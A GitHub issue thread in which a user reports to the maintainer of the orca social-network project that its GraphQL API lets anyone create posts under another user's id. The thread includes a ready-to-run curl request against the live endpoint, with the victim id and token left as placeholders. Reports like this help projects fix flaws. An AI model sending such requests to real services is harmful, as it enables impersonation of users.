### ISSUE TITLE
Security problem

### ISSUE THREAD

**Issue by fabiooshiro** [DimiMikadze/orca#65]
Hi guys, nice work!

I found a problem that allows me to post with name of other people...

How the security layer works in resolvers?

**Comment by DimiMikadze** [comment]
Hi @fabiooshiro, thanks for opening the issue. However, please respect the issue template, so the bug you are encountering is easily understandable and replicable for other people.

You need to elaborate more on describing the bug and explaining steps to reproduce.

**Comment by fabiooshiro** [comment]
step 1, find the user id
![image](https://user-images.githubusercontent.com/218768/92235426-09785500-ee8a-11ea-8831-12bd6602e1c4.png)

step 2, replace the access token and the id
```
curl 'https://csn-api.herokuapp.com/graphql' \
  -H 'Connection: keep-alive' \
  -H 'accept: */*' \
  -H 'authorization: <YOUR-ACCESS-TOKEN>' \
  -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36' \
  -H 'content-type: application/json' \
  -H 'Origin: https://worldexplorer.netlify.app' \
  -H 'Sec-Fetch-Site: cross-site' \
  -H 'Sec-Fetch-Mode: cors' \
  -H 'Sec-Fetch-Dest: empty' \
  -H 'Referer: https://worldexplorer.netlify.app/' \
  -H 'Accept-Language: en-US,en;q=0.9,pt;q=0.8' \
  --data-binary $'{"operationName":null,"variables":{"input":{"title":"Some post","image":"","authorId":"<THE-USER-ID>"}},"query":"mutation ($input: CreatePostInput\u0021) {\\n  createPost(input: $input) {\\n    id\\n    __typename\\n  }\\n}\\n"}' \
  --compressed
```

**Comment by fabiooshiro** [comment]
the result
![image](https://user-images.githubusercontent.com/218768/92235701-80155280-ee8a-11ea-9327-3f5793912144.png)

**Comment by fabiooshiro** [comment]
If you dig more you will see that all system parts suffer from the same problem...
Good news is that's not difficult do solve

**Comment by fabiooshiro** [comment]
take your time

**Comment by DimiMikadze** [comment]
@fabiooshiro Once again, thank you for reporting the bug.

Currently, I'm busy with other projects, and I'm planning to address this issue soon when I'm available.

At first, we need to investigate what parts of the application contain the bug. Then create an issue with a detailed description of the bugs, explanation of how to reproduce them, and plan how to fix them.

Finally, we can start working on a PR based on a plan.

If you want to take part in this process, your work will be much appreciated, but please keep the "plan" and "issue/PR" templates in mind.

**Comment by DimiMikadze** [comment]
Closing in favor of #73
